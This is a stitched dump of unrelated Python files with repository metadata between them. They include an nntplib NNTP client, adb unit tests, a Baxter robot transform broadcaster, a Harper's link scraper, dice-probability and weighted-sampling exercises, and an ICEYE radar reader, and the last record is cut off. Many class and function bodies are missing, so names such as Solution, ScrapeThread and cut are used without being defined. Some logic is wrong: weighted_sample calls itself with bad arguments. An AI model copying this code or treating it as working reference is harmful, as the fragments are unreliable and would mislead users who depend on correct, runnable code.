"Apache-2.0"
] | 4 | 2018-02-15T12:32:26.000Z | 2018-03-06T16:33:34.000Z | rdsslib/kinesis/client.py | JiscSD/rdss-shared-libraries | cf07cad3f176ef8be1410fc29b240fb4791e607a | [
"Apache-2.0"
] | 1 | 2018-03-13T19:38:54.000Z | 2018-03-13T19:38:54.000Z | import json
import logging
from .errors import MaxRetriesExceededException, DecoratorApplyException
MAX_ATTEMPTS = 6
| 39.346457 | 79 | 0.626976 |
0cdd0af2f9cdd4f1682dfeb1a35ec8ea6569dc39 | 516 | py | Python | offer/10-qing-wa-tiao-tai-jie-wen-ti-lcof.py | wanglongjiang/leetcode | c61d2e719e81575cfb5bde9d64e15cee7cf01ef3 | [
"MIT"
] | 2 | 2021-03-14T11:38:26.000Z | 2021-03-14T11:38:30.000Z | offer/10-qing-wa-tiao-tai-jie-wen-ti-lcof.py | wanglongjiang/leetcode | c61d2e719e81575cfb5bde9d64e15cee7cf01ef3 | [
"MIT"
] | null | null | null | offer/10-qing-wa-tiao-tai-jie-wen-ti-lcof.py | wanglongjiang/leetcode | c61d2e719e81575cfb5bde9d64e15cee7cf01ef3 | [
"MIT"
] | 1 | 2022-01-17T19:33:23.000Z | 2022-01-17T19:33:23.000Z | '''
Offer 10- II.
12 n
1e9+710000000071000000008 1
0 <= n <= 100
'''
'''
:
'''
s = Solution()
print(s.numWays(2))
print(s.numWays(5))
print(s.numWays(0))
print(s.numWays(7))
| 15.636364 | 71 | 0.560078 |
0cddc6fcdac1a04a9f2296ecc74335e532a712c0 | 2,624 | py | Python | recipes/libmount/all/conanfile.py | KristianJerpetjon/conan-center-index | f368200c30fb3be44862e2e709be990d0db4d30e | [
"MIT"
] | null | null | null | recipes/libmount/all/conanfile.py | KristianJerpetjon/conan-center-index | f368200c30fb3be44862e2e709be990d0db4d30e | [
"MIT"
] | 1 | 2019-11-26T10:55:31.000Z | 2019-11-26T10:55:31.000Z | recipes/libmount/all/conanfile.py | KristianJerpetjon/conan-center-index | f368200c30fb3be44862e2e709be990d0db4d30e | [
"MIT"
] | 1 | 2019-10-31T19:29:14.000Z | 2019-10-31T19:29:14.000Z | from conans import ConanFile, tools, AutoToolsBuildEnvironment
from conans.errors import ConanInvalidConfiguration
import os
| 43.733333 | 161 | 0.651296 |
0cde288694905dadb83458256a681e9a26cd9df7 | 36,246 | py | Python | code/tmp_rtrip/nntplib.py | emilyemorehouse/ast-and-me | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | [
"MIT"
] | 24 | 2018-01-23T05:28:40.000Z | 2021-04-13T20:52:59.000Z | code/tmp_rtrip/nntplib.py | emilyemorehouse/ast-and-me | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | [
"MIT"
] | 17 | 2017-12-21T18:32:31.000Z | 2018-12-18T17:09:50.000Z | code/tmp_rtrip/nntplib.py | emilyemorehouse/ast-and-me | 3f58117512e125e1ecbe3c72f2f0d26adb80b7b3 | [
"MIT"
] | null | null | null | """An NNTP client class based on:
- RFC 977: Network News Transfer Protocol
- RFC 2980: Common NNTP Extensions
- RFC 3977: Network News Transfer Protocol (version 2)
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'rb') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
import re
import socket
import collections
import datetime
import warnings
try:
import ssl
except ImportError:
_have_ssl = False
else:
_have_ssl = True
from email.header import decode_header as _email_decode_header
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ['NNTP', 'NNTPError', 'NNTPReplyError', 'NNTPTemporaryError',
'NNTPPermanentError', 'NNTPProtocolError', 'NNTPDataError', 'decode_header'
]
_MAXLINE = 2048
NNTP_PORT = 119
NNTP_SSL_PORT = 563
_LONGRESP = {'100', '101', '211', '215', '220', '221', '222', '224', '225',
'230', '231', '282'}
_DEFAULT_OVERVIEW_FMT = ['subject', 'from', 'date', 'message-id',
'references', ':bytes', ':lines']
_OVERVIEW_FMT_ALTERNATIVES = {'bytes': ':bytes', 'lines': ':lines'}
_CRLF = b'\r\n'
GroupInfo = collections.namedtuple('GroupInfo', ['group', 'last', 'first',
'flag'])
ArticleInfo = collections.namedtuple('ArticleInfo', ['number', 'message_id',
'lines'])
def decode_header(header_str):
"""Takes a unicode string representing a munged header value
and decodes it as a (possibly non-ASCII) readable value."""
parts = []
for v, enc in _email_decode_header(header_str):
if isinstance(v, bytes):
parts.append(v.decode(enc or 'ascii'))
else:
parts.append(v)
return ''.join(parts)
def _parse_overview_fmt(lines):
"""Parse a list of string representing the response to LIST OVERVIEW.FMT
and return a list of header/metadata names.
Raises NNTPDataError if the response is not compliant
(cf. RFC 3977, section 8.4)."""
fmt = []
for line in lines:
if line[0] == ':':
name, _, suffix = line[1:].partition(':')
name = ':' + name
else:
name, _, suffix = line.partition(':')
name = name.lower()
name = _OVERVIEW_FMT_ALTERNATIVES.get(name, name)
fmt.append(name)
defaults = _DEFAULT_OVERVIEW_FMT
if len(fmt) < len(defaults):
raise NNTPDataError('LIST OVERVIEW.FMT response too short')
if fmt[:len(defaults)] != defaults:
raise NNTPDataError('LIST OVERVIEW.FMT redefines default fields')
return fmt
def _parse_overview(lines, fmt, data_process_func=None):
"""Parse the response to an OVER or XOVER command according to the
overview format `fmt`."""
n_defaults = len(_DEFAULT_OVERVIEW_FMT)
overview = []
for line in lines:
fields = {}
article_number, *tokens = line.split('\t')
article_number = int(article_number)
for i, token in enumerate(tokens):
if i >= len(fmt):
continue
field_name = fmt[i]
is_metadata = field_name.startswith(':')
if i >= n_defaults and not is_metadata:
h = field_name + ': '
if token and token[:len(h)].lower() != h:
raise NNTPDataError(
"OVER/XOVER response doesn't include names of additional headers"
)
token = token[len(h):] if token else None
fields[fmt[i]] = token
overview.append((article_number, fields))
return overview
def _parse_datetime(date_str, time_str=None):
"""Parse a pair of (date, time) strings, and return a datetime object.
If only the date is given, it is assumed to be date and time
concatenated together (e.g. response to the DATE command).
"""
if time_str is None:
time_str = date_str[-6:]
date_str = date_str[:-6]
hours = int(time_str[:2])
minutes = int(time_str[2:4])
seconds = int(time_str[4:])
year = int(date_str[:-4])
month = int(date_str[-4:-2])
day = int(date_str[-2:])
if year < 70:
year += 2000
elif year < 100:
year += 1900
return datetime.datetime(year, month, day, hours, minutes, seconds)
def _unparse_datetime(dt, legacy=False):
"""Format a date or datetime object as a pair of (date, time) strings
in the format required by the NEWNEWS and NEWGROUPS commands. If a
date object is passed, the time is assumed to be midnight (00h00).
The returned representation depends on the legacy flag:
* if legacy is False (the default):
date has the YYYYMMDD format and time the HHMMSS format
* if legacy is True:
date has the YYMMDD format and time the HHMMSS format.
RFC 3977 compliant servers should understand both formats; therefore,
legacy is only needed when talking to old servers.
"""
if not isinstance(dt, datetime.datetime):
time_str = '000000'
else:
time_str = '{0.hour:02d}{0.minute:02d}{0.second:02d}'.format(dt)
y = dt.year
if legacy:
y = y % 100
date_str = '{0:02d}{1.month:02d}{1.day:02d}'.format(y, dt)
else:
date_str = '{0:04d}{1.month:02d}{1.day:02d}'.format(y, dt)
return date_str, time_str
if _have_ssl:
def _encrypt_on(sock, context, hostname):
"""Wrap a socket in SSL/TLS. Arguments:
- sock: Socket to wrap
- context: SSL context to use for the encrypted connection
Returns:
- sock: New, encrypted socket.
"""
if context is None:
context = ssl._create_stdlib_context()
return context.wrap_socket(sock, server_hostname=hostname)
if _have_ssl:
__all__.append('NNTP_SSL')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=
' nntplib built-in demo - display the latest articles in a newsgroup'
)
parser.add_argument('-g', '--group', default=
'gmane.comp.python.general', help=
'group to fetch messages from (default: %(default)s)')
parser.add_argument('-s', '--server', default='news.gmane.org', help=
'NNTP server hostname (default: %(default)s)')
parser.add_argument('-p', '--port', default=-1, type=int, help=
'NNTP port number (default: %s / %s)' % (NNTP_PORT, NNTP_SSL_PORT))
parser.add_argument('-n', '--nb-articles', default=10, type=int, help=
'number of articles to fetch (default: %(default)s)')
parser.add_argument('-S', '--ssl', action='store_true', default=False,
help='use NNTP over SSL')
args = parser.parse_args()
port = args.port
if not args.ssl:
if port == -1:
port = NNTP_PORT
s = NNTP(host=args.server, port=port)
else:
if port == -1:
port = NNTP_SSL_PORT
s = NNTP_SSL(host=args.server, port=port)
caps = s.getcapabilities()
if 'STARTTLS' in caps:
s.starttls()
resp, count, first, last, name = s.group(args.group)
print('Group', name, 'has', count, 'articles, range', first, 'to', last)
first = str(int(last) - args.nb_articles + 1)
resp, overviews = s.xover(first, last)
for artnum, over in overviews:
author = decode_header(over['from']).split('<', 1)[0]
subject = decode_header(over['subject'])
lines = int(over[':lines'])
print('{:7} {:20} {:42} ({})'.format(artnum, cut(author, 20), cut(
subject, 42), lines))
s.quit()
| 36.20979 | 89 | 0.580202 |
0cde5c372756830b141e6816281e99f572d9eff3 | 3,463 | py | Python | tests/required_with_test.py | roypeters/spotlight | f23818cf7b49aa7a31200c1945ebc2d91656156e | [
"MIT"
] | 9 | 2019-03-26T13:21:16.000Z | 2021-03-21T08:55:49.000Z | tests/required_with_test.py | roypeters/spotlight | f23818cf7b49aa7a31200c1945ebc2d91656156e | [
"MIT"
] | 7 | 2019-03-28T17:32:03.000Z | 2021-09-24T13:17:32.000Z | tests/required_with_test.py | roypeters/spotlight | f23818cf7b49aa7a31200c1945ebc2d91656156e | [
"MIT"
] | 4 | 2019-03-30T13:28:22.000Z | 2020-06-15T13:15:44.000Z | from src.spotlight.errors import REQUIRED_WITH_ERROR
from .validator_test import ValidatorTest
| 32.064815 | 86 | 0.626047 |
0cde6e9d59bff904867397a498cf0cce96687bf3 | 3,194 | py | Python | default-approach/data-collection/harpers-data/scraper_scripts/get-harpers-links.py | the-browser/recommending-interesting-writing | 9ff4771d3f437d33c26d2f306e393b5a90a04878 | [
"MIT"
] | 5 | 2020-09-17T17:56:21.000Z | 2021-11-03T02:40:27.000Z | default-approach/data-collection/harpers-data/scraper_scripts/get-harpers-links.py | the-browser/recommending-interesting-writing | 9ff4771d3f437d33c26d2f306e393b5a90a04878 | [
"MIT"
] | null | null | null | default-approach/data-collection/harpers-data/scraper_scripts/get-harpers-links.py | the-browser/recommending-interesting-writing | 9ff4771d3f437d33c26d2f306e393b5a90a04878 | [
"MIT"
] | 1 | 2020-11-01T11:37:38.000Z | 2020-11-01T11:37:38.000Z | BASE_URL="https://harpers.org/sections/readings/page/"
N_ARTICLE_LINK_PAGES = 50
OUTPUT_FILE = 'harpers-later-urls.json'
WORKER_THREADS = 32
import json
import datetime
import dateutil.parser
from dataclasses import dataclass
from dataclasses_json import dataclass_json
from datetime import datetime
from newspaper import Article
from bs4 import BeautifulSoup
from typing import List
from queue import Queue
from threading import Thread
from requests import get
from pathlib import Path
import pandas as pd
from urllib.request import Request, urlopen
if __name__ == '__main__':
queue = Queue()
write_thread = WriteThread(queue)
write_thread.start()
worker_threads = []
chunk_size = (N_ARTICLE_LINK_PAGES) // WORKER_THREADS
for i in range(0, N_ARTICLE_LINK_PAGES+1, chunk_size):
chunk = range(i,i+chunk_size)
worker_threads.append(ScrapeThread(chunk, queue))
for thread in worker_threads:
thread.start()
for thread in worker_threads:
thread.join()
# Signal end of jobs to write thread
queue.put(None)
print('Done.')
write_thread.join()
| 31.313725 | 114 | 0.60551 |
0cdee741020f9cadb35d114ce192b7140ac463d7 | 8,711 | py | Python | rulm/models/neural_net/encoder_only.py | IlyaGusev/rulm | 4e78a495eba6cd6ea1fea839463c8145ed7051f2 | [
"Apache-2.0"
] | null | null | null | rulm/models/neural_net/encoder_only.py | IlyaGusev/rulm | 4e78a495eba6cd6ea1fea839463c8145ed7051f2 | [
"Apache-2.0"
] | null | null | null | rulm/models/neural_net/encoder_only.py | IlyaGusev/rulm | 4e78a495eba6cd6ea1fea839463c8145ed7051f2 | [
"Apache-2.0"
] | null | null | null | from typing import Dict
import numpy as np
import torch
from torch.nn.functional import linear, log_softmax, embedding
from torch.nn import Dropout, LogSoftmax, NLLLoss
from allennlp.common import Params
from allennlp.models.model import Model
from allennlp.data.vocabulary import Vocabulary, DEFAULT_PADDING_TOKEN
from allennlp.modules import TextFieldEmbedder, TimeDistributed, Seq2SeqEncoder
from allennlp.modules.sampled_softmax_loss import SampledSoftmaxLoss
from allennlp.modules.input_variational_dropout import InputVariationalDropout
from allennlp.modules.token_embedders import Embedding, TokenEmbedder
from allennlp.modules.token_embedders.embedding import _read_pretrained_embeddings_file
from allennlp.nn.util import combine_initial_dims, uncombine_initial_dims
| 44.218274 | 105 | 0.630926 |
0cdf83ec2ee6735ac3ecbd989380ce0f87917a5d | 102 | py | Python | api/queries/models.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 3 | 2019-05-15T09:30:39.000Z | 2020-04-22T16:14:23.000Z | api/queries/models.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 85 | 2019-04-24T10:39:35.000Z | 2022-03-21T14:52:12.000Z | api/queries/models.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | 1 | 2021-01-17T11:12:19.000Z | 2021-01-17T11:12:19.000Z | from api.cases.models import Case
| 10.2 | 33 | 0.588235 |
0cdfbe0659d37b3cc8cc00e18f2f0edb48d21d4a | 3,410 | py | Python | src/scs_airnow/cmd/cmd_csv_join.py | south-coast-science/scs_airnow | 7f0657bd434aa3abe667f58bc971edaa00d0c24c | [
"MIT"
] | null | null | null | src/scs_airnow/cmd/cmd_csv_join.py | south-coast-science/scs_airnow | 7f0657bd434aa3abe667f58bc971edaa00d0c24c | [
"MIT"
] | null | null | null | src/scs_airnow/cmd/cmd_csv_join.py | south-coast-science/scs_airnow | 7f0657bd434aa3abe667f58bc971edaa00d0c24c | [
"MIT"
] | null | null | null | """
Created on 22 Feb 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
source repo: scs_analysis
"""
import optparse
# --------------------------------------------------------------------------------------------------------------------
| 31.284404 | 118 | 0.509091 |
0ce058cd8a6d65a8bc31474a1e02dc8c29923fe6 | 338 | py | Python | test/receive_message.py | unknown-admin/easymq | e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | [
"Apache-2.0"
] | 1 | 2020-04-20T14:01:34.000Z | 2020-04-20T14:01:34.000Z | test/receive_message.py | unknown-admin/easymq | e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | [
"Apache-2.0"
] | null | null | null | test/receive_message.py | unknown-admin/easymq | e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | [
"Apache-2.0"
] | 1 | 2022-02-18T08:18:08.000Z | 2022-02-18T08:18:08.000Z | import os
from easymq.mq import MQ
mq = MQ(
mq_user=os.environ.get("mq_user"),
password=os.environ.get("password"),
host_and_ports=[
(os.environ.get("host"), os.environ.get("port")),
],
func=receive,
queue_name="/queue/test_queue",
)
mq.receive()
| 16.095238 | 57 | 0.612426 |
0ce0840b66e590ef2a41c729b631412a225153c7 | 12,383 | py | Python | test/unit/agent/common/util/text.py | dp92987/nginx-amplify-agent | 1b2eed6eab52a82f35974928d75044451b4bedaf | [
"BSD-2-Clause"
] | 308 | 2015-11-17T13:15:33.000Z | 2022-03-24T12:03:40.000Z | test/unit/agent/common/util/text.py | dp92987/nginx-amplify-agent | 1b2eed6eab52a82f35974928d75044451b4bedaf | [
"BSD-2-Clause"
] | 211 | 2015-11-16T15:27:41.000Z | 2022-03-28T16:20:15.000Z | test/unit/agent/common/util/text.py | dp92987/nginx-amplify-agent | 1b2eed6eab52a82f35974928d75044451b4bedaf | [
"BSD-2-Clause"
] | 80 | 2015-11-16T18:20:30.000Z | 2022-03-02T12:47:56.000Z | # -*- coding: utf-8 -*-
from hamcrest import *
from test.base import BaseTestCase
from amplify.agent.common.util.text import (
decompose_format, parse_line, parse_line_split
)
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
COMBINED_FORMAT = '$remote_addr - $remote_user [$time_local] "$request" ' + \
'$status $body_bytes_sent "$http_referer" "$http_user_agent"'
| 42.407534 | 115 | 0.605023 |
0ce1ead7fccfec4e0bc42fdbdc128b022ce3b62a | 9,982 | py | Python | test/adb_test.py | bugobliterator/python-adb | 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | [
"Apache-2.0"
] | 1,549 | 2015-01-04T04:45:48.000Z | 2022-03-31T08:01:59.000Z | test/adb_test.py | bugobliterator/python-adb | 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | [
"Apache-2.0"
] | 174 | 2015-01-04T04:47:39.000Z | 2022-03-24T10:42:12.000Z | test/adb_test.py | bugobliterator/python-adb | 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | [
"Apache-2.0"
] | 356 | 2015-01-09T10:10:33.000Z | 2022-03-27T19:25:01.000Z | #!/usr/bin/env python
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for adb."""
from io import BytesIO
import struct
import unittest
from mock import mock
from adb import common
from adb import adb_commands
from adb import adb_protocol
from adb.usb_exceptions import TcpTimeoutException, DeviceNotFoundError
import common_stub
BANNER = b'blazetest'
LOCAL_ID = 1
REMOTE_ID = 2
def testPull(self):
filedata = b"g'ddayta, govnah"
recv = self._MakeWriteSyncPacket(b'RECV', b'/data')
data = [
self._MakeWriteSyncPacket(b'DATA', filedata),
self._MakeWriteSyncPacket(b'DONE'),
]
usb = self._ExpectSyncCommand([recv], [b''.join(data)])
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(filedata, dev.Pull('/data'))
class TcpTimeoutAdbTest(BaseAdbTest):
class TcpHandleTest(unittest.TestCase):
if __name__ == '__main__':
unittest.main()
| 31.588608 | 102 | 0.696053 |
0ce32973b15677a9edaeef840f01f4ffb57eb837 | 6,149 | py | Python | 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | felixdittrich92/numerisches_python | 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | [
"MIT"
] | null | null | null | 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | felixdittrich92/numerisches_python | 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | [
"MIT"
] | null | null | null | 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | felixdittrich92/numerisches_python | 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | [
"MIT"
] | null | null | null | from random import randint
import numpy as np
from collections import Counter
from pprint import pprint
import time
# Aufgaben Siehe Buch
print('-------------Aufgabe 1-------------')
outcomes = [ randint(1,6) for _ in range(10000)]
even_pips = [ x for x in outcomes if x % 2 == 0]
greater_two = [ x for x in outcomes if x > 2]
combined = [ x for x in outcomes if x % 2 == 0 and x > 2]
print(len(even_pips)/len(outcomes))
print(len(greater_two)/len(outcomes))
print(len(combined)/len(outcomes))
print('-------------Aufgabe 2-------------')
def find_interval(x, partition):
""" find_interval -> i
"i" will be the index for which applies
partition[i] < x < partition[i+1], if such an index exists.
-1 otherwise
"""
for i in range(0, len(partition)):
if x < partition[i]:
return i-1
return -1
def weighted_choice(sequence, weights, bisection=False):
"""
weighted_choice selects a random element of
the sequence according to the weights list
"""
x = np.random.random()
w = [0] + list(np.cumsum(weights))
index = find_interval(x, w)
return sequence[index]
def process_datafile(filename):
""" process_datafile -> (universities,enrollments,total_number_of_students)
universities: list of University
namesenrollments: corresponding list with enrollments
total_number_of_students: over all universities"""
universities=[]
enrollments=[]
with open(filename) as fh:
total_number_of_students= 0
fh.readline()# get rid of descriptive first line
for line in fh:
line=line.strip()
*praefix, under, post, total = line.rsplit()
university = praefix[1:]
total = int(total.replace(",",""))
enrollments.append(total)
universities.append(" ".join(university))
total_number_of_students += total
return(universities, enrollments, total_number_of_students)
universities, enrollments, total_students = process_datafile("universities_uk.txt")
"""
for i in range(14):
print(universities[i], end=": ")
print(enrollments[i])
print("Number of students enrolled in the UK: ", total_students)
"""
normalized_enrollments = [students / total_students for students in enrollments]
print(weighted_choice(universities, normalized_enrollments))
outcomes=[]
n= 100000
for i in range(n):
outcomes.append(weighted_choice(universities,normalized_enrollments))
c = Counter(outcomes)
pprint(c.most_common(20),indent=2, width=70)
print('-------------Aufgabe 3-------------')
def find_interval(x,
partition,
endpoints=True):
""" find_interval -> i
If endpoints is True, "i" will be the index for which applies
partition[i] < x < partition[i+1], if such an index exists.
-1 otherwise
If endpoints is False, "i" will be the smallest index
for which applies x < partition[i]. If no such index exists
"i" will be set to len(partition)
"""
for i in range(0, len(partition)):
if x < partition[i]:
return i-1 if endpoints else i
return -1 if endpoints else len(partition)
def weighted_choice(sequence, weights):
"""
weighted_choice selects a random element of
the sequence according to the list of weights
"""
x = np.random.random()
cum_weights = [0] + list(np.cumsum(weights))
index = find_interval(x, cum_weights)
return sequence[index]
def cartesian_choice(*iterables):
"""
A list with random choices from each iterable of iterables
is being created in respective order.
The result list can be seen as an element of the
Cartesian product of the iterables
"""
res = []
for population in iterables:
res.append(random.choice(population))
return res
def weighted_cartesian_choice(*iterables):
"""
A list with weighted random choices from each iterable of iterables
is being created in respective order
"""
res = []
for population, weights in iterables:
lst = weighted_choice(population, weights)
res.append(lst)
return res
def weighted_sample(population, weights, k):
"""
This function draws a random sample of length k
from the sequence 'population' according to the
list of weights
"""
sample = set()
population = list(population)
weights = list(weights)
while len(sample) < k:
choice = weighted_sample(population, weights)
sample.add(choice)
index = population.index(choice)
weights.pop(index)
population.remove(choice)
weights = [ x / sum(weights) for x in weights]
return list(sample)
def weighted_sample_alternative(population, weights, k):
"""
Alternative way to previous implementation.
This function draws a random sample of length k
from the sequence 'population' according to the
list of weights
"""
sample = set()
population = list(population)
weights = list(weights)
while len(sample) < k:
choice = weighted_sample(population, weights)
if choice not in sample:
sample.add(choice)
return list(sample)
amazons = ["Airla","Barbara","Eos",
"Glykeria","Hanna","Helen",
"Agathangelos","Iokaste","Medousa",
"Sofronia","Andromeda"]
weights = np.full(11,1/len(amazons))
Pytheusses_favorites = {"Iokaste","Medousa","Sofronia","Andromeda"}
n = 1000
counter = 0
prob= 1 / 330
days = 0
factor1 = 1 / 13
factor2 = 1 / 12
start = time.perf_counter()
while prob < 0.9:
for i in range(n):
the_chosen_ones = weighted_sample_alternative(amazons, weights, 4)
if set(the_chosen_ones) == Pytheusses_favorites:
counter += 1
prob = counter / n
counter = 0
weights[:7] = weights[:7] - weights[:7] * factor1
weights[7:] = weights[7:] + weights[7:] * factor2
weights = weights / np.sum(weights)
#print(weights)
days += 1
print(time.perf_counter() - start)
print("Number of days, he has to wait: ", days) | 29.5625 | 83 | 0.643031 |
0ce58d7de1508c5e2496368e37a432c416830c42 | 2,183 | py | Python | lib_dsp/iir/iir/design/iir.py | PyGears/lib-dsp | a4c80882f5188799233dc9108f91faa4bab0ac57 | [
"MIT"
] | 3 | 2019-08-26T17:32:33.000Z | 2022-03-19T02:05:02.000Z | pygears_dsp/lib/iir.py | bogdanvuk/pygears-dsp | ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995 | [
"MIT"
] | null | null | null | pygears_dsp/lib/iir.py | bogdanvuk/pygears-dsp | ca107d3f9e8d02023e9ccd27f7bc95f10b5aa995 | [
"MIT"
] | 5 | 2019-09-18T18:00:13.000Z | 2022-03-28T11:07:26.000Z | from pygears import gear, Intf
from pygears.lib import dreg, decouple, saturate, qround
| 24.255556 | 117 | 0.601466 |
0ce5cb9e4bc10393a6546a397038a2d745082f63 | 3,752 | py | Python | read_iceye_h5.py | eciraci/iceye_gamma_proc | 68b04bfd55082862f419031c28e7b52f1800f3db | [
"MIT"
] | null | null | null | read_iceye_h5.py | eciraci/iceye_gamma_proc | 68b04bfd55082862f419031c28e7b52f1800f3db | [
"MIT"
] | null | null | null | read_iceye_h5.py | eciraci/iceye_gamma_proc | 68b04bfd55082862f419031c28e7b52f1800f3db | [
"MIT"
] | null | null | null | #!/usr/bin/env python
u"""
read_iceye_h5.py
Written by Enrico Ciraci' (03/2022)
Read ICEYE Single Look Complex and Parameter file using GAMMA's Python
integration with the py_gamma module.
usage: read_iceye_h5.py [-h] [--directory DIRECTORY]
TEST: Read ICEye Single Look Complex and Parameter.
optional arguments:
-h, --help show this help message and exit
--directory DIRECTORY, -D DIRECTORY
Project data directory.
--slc SLC, -C SLC Process and single SLC.
PYTHON DEPENDENCIES:
argparse: Parser for command-line options, arguments and sub-commands
https://docs.python.org/3/library/argparse.html
datetime: Basic date and time types
https://docs.python.org/3/library/datetime.html#module-datetime
tqdm: Progress Bar in Python.
https://tqdm.github.io/
py_gamma: GAMMA's Python integration with the py_gamma module
UPDATE HISTORY:
"""
# - Python Dependencies
from __future__ import print_function
import os
import argparse
import datetime
from tqdm import tqdm
# - GAMMA's Python integration with the py_gamma module
import py_gamma as pg
# - Utility Function
from utils.make_dir import make_dir
# - run main program
if __name__ == '__main__':
start_time = datetime.datetime.now()
main()
end_time = datetime.datetime.now()
print(f"# - Computation Time: {end_time - start_time}")
| 36.076923 | 81 | 0.63033 |
0ce5d95f10a05417cb3b6fc154c24d7adc27cf45 | 1,877 | py | Python | scripts/baxter_find_tf.py | mkrizmancic/qlearn_baxter | 0498315212cacb40334cbb97a858c6ba317f52a3 | [
"MIT"
] | 4 | 2017-11-11T18:16:22.000Z | 2018-11-08T13:31:09.000Z | scripts/baxter_find_tf.py | mkrizmancic/qlearn_baxter | 0498315212cacb40334cbb97a858c6ba317f52a3 | [
"MIT"
] | null | null | null | scripts/baxter_find_tf.py | mkrizmancic/qlearn_baxter | 0498315212cacb40334cbb97a858c6ba317f52a3 | [
"MIT"
] | 2 | 2019-09-04T12:28:58.000Z | 2021-09-27T13:02:48.000Z | #!/usr/bin/env python
"""Calculate transformation matrices and broadcast transform from robot's base to head markers."""
import rospy
import tf
import math
from PyKDL import Vector, Frame, Rotation
if __name__ == '__main__':
rospy.init_node('baxter_find_transformation')
listener = tf.TransformListener()
br = tf.TransformBroadcaster()
rate = rospy.Rate(50)
while not rospy.is_shutdown():
try:
(trans_OH, rot_OH) = listener.lookupTransform('/optitrack', '/bax_head', rospy.Time(0))
(trans_OA, rot_OA) = listener.lookupTransform('/optitrack', '/bax_arm', rospy.Time(0))
(trans_BG, rot_BG) = listener.lookupTransform('/base', '/left_gripper_base', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
# Rotations
rot_OH = Rotation.Quaternion(*rot_OH)
rot_OA = Rotation.Quaternion(*rot_OA)
rot_BG = Rotation.Quaternion(*rot_BG)
rot_AG = Rotation.RPY(math.pi / 2, -math.pi, math.pi / 2)
# Creating Frames
T_OH = Frame(rot_OH, Vector(*trans_OH))
T_OA = Frame(rot_OA, Vector(*trans_OA))
T_BG = Frame(rot_BG, Vector(*trans_BG))
T_AG = Frame(rot_AG, Vector(0, 0, 0))
# Finding right transformation
T_HB = T_OH.Inverse() * T_OA * T_AG * T_BG.Inverse()
T_empty_p = Vector(0, 0, 0)
T_empty_Q = Rotation.Quaternion(0, 0, 0, 1)
T_empty = Frame(T_empty_Q, T_empty_p)
# Broadcast new transformations
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'base', 'bax_head')
br.sendTransform(T_HB.p, T_HB.M.GetQuaternion(), rospy.Time.now(), 'reference/base', 'bax_head')
br.sendTransform(T_empty.p, T_empty.M.GetQuaternion(), rospy.Time.now(), 'world', 'base')
rate.sleep()
| 39.93617 | 104 | 0.64731 |
0ce7201689d9142cf85fb513dc2bf55a86b13523 | 475 | py | Python | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2022-01-10 12:39
from django.db import migrations, models
import django.utils.timezone
| 22.619048 | 86 | 0.621053 |
0ce7e95642a1dd2c0010de92c604aaf0452e7669 | 509 | py | Python | src/prepare_data/task_prepare_r_effective_by_rki.py | covid-19-impact-lab/sid-germany | aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | [
"MIT"
] | 4 | 2021-04-24T14:43:47.000Z | 2021-07-03T14:05:21.000Z | src/prepare_data/task_prepare_r_effective_by_rki.py | covid-19-impact-lab/sid-germany | aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | [
"MIT"
